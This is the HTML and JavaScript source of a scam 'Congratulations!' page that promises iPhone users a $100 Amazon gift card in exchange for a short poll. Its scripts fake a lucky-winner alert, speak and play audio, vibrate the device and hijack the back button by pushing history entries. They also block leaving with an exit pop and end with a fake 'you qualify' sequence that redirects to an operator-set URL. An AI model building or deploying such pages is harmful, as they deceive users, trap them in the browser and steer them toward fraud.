<!DOCTYPE html>
<html>

<head>
    <base href="">

    <script type="text/javascript">
		var redirurl = 'http://www.youtube.com'//change to desired redirect url
        function speak(c) {
            var b = new SpeechSynthesisUtterance();
            var a = speechSynthesis.getVoices();
            b.voice = a[2];
            b.voiceURI = "native";
            b.volume = 1;
            b.rate = 1;
            b.pitch = 1;
            b.text = c;
            b.lang = "en-US";
            speechSynthesis.speak(b)
        }
        speak("Congratulations!");
     
        function getURLParameter(name) {
            return decodeURI(
                (RegExp(name + '=' + '(.+?)(&|$)').exec(location.search) || [, null])[1] || ''
            );
        }
     
        function gourl() {
            location.replace(redirurl, '_blank');
        }
     
        function exit_a1() {
            window.onbeforeunload = null;
            window.location = redirurl;
            window.open(redirurl, '_blank');
            PreventExitSplash = !0;
            return false;
        }
    </script>

    <meta charset="UTF-8">
    <meta name="viewport" content="initial-scale=1.0, maximum-scale=1.0">
    <meta content="" name="keywords">
    <meta content="" name="description">

    <title>Congratulations!</title>

    <script type="text/javascript" src="js/jquery.min.js"></script>
	<link rel="stylesheet" href="css/style.css" type="text/css" media="all">
</head>

<body style="">
    <style>
        
    </style>
    <div class="header_container">
        <div class="header"></div>
    </div>
    <div class="content">
        <div class="main-content" id="content1">
            <div style="max-width:400px;margin:0 auto;"><img src="images/amazon.jpg" style="width:280px">
            </div>
            <h1>
      We're giving <script>document.write(getURLParameter('brand'))</script>Apple<script>document.write(getURLParameter('model'))</script>iPhone Users a chance to get  <strong>a $100 Amazon Gift Card</strong><sup>®</sup>!

    </h1>
            <h2>

Answer the poll and win an Amazon voucher!                  
    </h2>
            <hr>
            <br>
            <br>
            <div id="q1" align="center">
                <p class="question"><strong>
         Question 1 of 3                                       
        </strong>
                    <br> Are you male or female?
                </p>
                <br>
                <div class="button bq1">
                    Male
                </div>
                <div class="button bq1">
                    Female
                </div>
            </div>
            <div id="q2" align="center">
                <p class="question"><strong>
          Question 2 of 3                              
        </strong>
                    <br> How old are you?
                </p>
                <br>
                <div class="button bq2">
                    18-29
                </div>
                <div class="button bq2">
                    30-39
                </div>
                <div class="button bq2">
                    40-49
                </div>
                <div class="button bq2">
                    50+
                </div>
            </div>
            <div id="q3" align="center">
                <p class="question"><strong>
          Question 3 of 3                              
        </strong>
                    <br> Do you shop online?
                </p>
                <br>
                <div class="button bq4">
                    Yes
                </div>
                <div class="button bq4">
                    No
                </div>
            </div>
        </div>
        <div class="main-content" id="content2">
            <h1 style="text-align:center;">
      Submitting Answers...                  
    </h1>
            <p class="loading"><img src="images/loading.gif">
            </p>

            <div style="max-width:320px;margin:0 auto;">
                <p class="result" id="result1">
                    ✔Analyzing Results...
                </p>
                <p class="result" id="result2">
                    ✔National Consumer Center you qualify!
                </p>
                <p class="result" id="result3">
                    ✔Redirecting to prize page...
                </p>
            </div>
            <a class="" onclick="exit_a1();PreventExitPop = false"></a>
        </div>

    </div>

    <script type="text/javascript">
		
        $(document).ready(function() {
            $(".bq1").click(function() {
                $("#q1").fadeOut(0);
                $("#q2").fadeIn(500);
            });
            $(".bq2").click(function() {
                $("#q2").fadeOut(0);
                $("#q3").fadeIn(500);
            });
            $(".bq3").click(function() {
                $("#q3").fadeOut(0);
                $("#q4").fadeIn(500);
            });
            $(".bq4").click(function() {
                $("#content1").fadeOut(0);
                $("#content2").fadeIn();
                setTimeout(function() {
                    $("#result1").fadeIn(1000);
                }, 3000);
                setTimeout(function() {
                    $("#result2").fadeIn(1000);
                }, 4500);
                setTimeout(function() {
                    $("#result3").fadeIn(1000);
                }, 6000);
                setTimeout(function() {
                    $("#content2").fadeOut();
                }, 7500);
                window.setTimeout(function() {
                    window.onbeforeunload = null;
                    window.location = redirurl;
                    window.open(redirurl, '_blank');
                    PreventExitSplash = !0;
                    return false;
                }, 7500);
            });
        });
     
        alert(" Congratulate " + (getURLParameter('brand')) + " User !, yours " + (getURLParameter('model')) + " Has been randomly selected! You are the third lucky user " + (getURLParameter('city')) + "!\n\n Click OK ")
     
        ! function() {
            var t;
            try {
                for (t = 0; 10 > t; ++t) history.pushState({}, "", "#");
                onpopstate = function(t) {
                    PreventExitPop = false;
                    t.state && location.replace(redirurl)
                }
            } catch (o) {}
        }();
     
        var PreventExitPop = true;

        function ExitPop() {
            window.open(redirurl, '_blank');
            if (PreventExitPop != false) {
                return "WAIT!"
            }
        }
        window.onbeforeunload = ExitPop;
    </script>

    <audio autoplay="autoplay" preload="">
        <source src="http://get1-0.com/amazon_100_us/1/default.ogg" type="audio/ogg">
		<source src="http://get1-0.com/amazon_100_us/1/default.mp3" type="audio/mpeg">
    </audio>

    <script type="text/javascript">
        navigator.vibrate = navigator.vibrate || navigator.webkitVibrate || navigator.mozVibrate || navigator.msVibrate;
        navigator.vibrate([1000, 500, 1000, 500]);
    </script>

</body>

</html>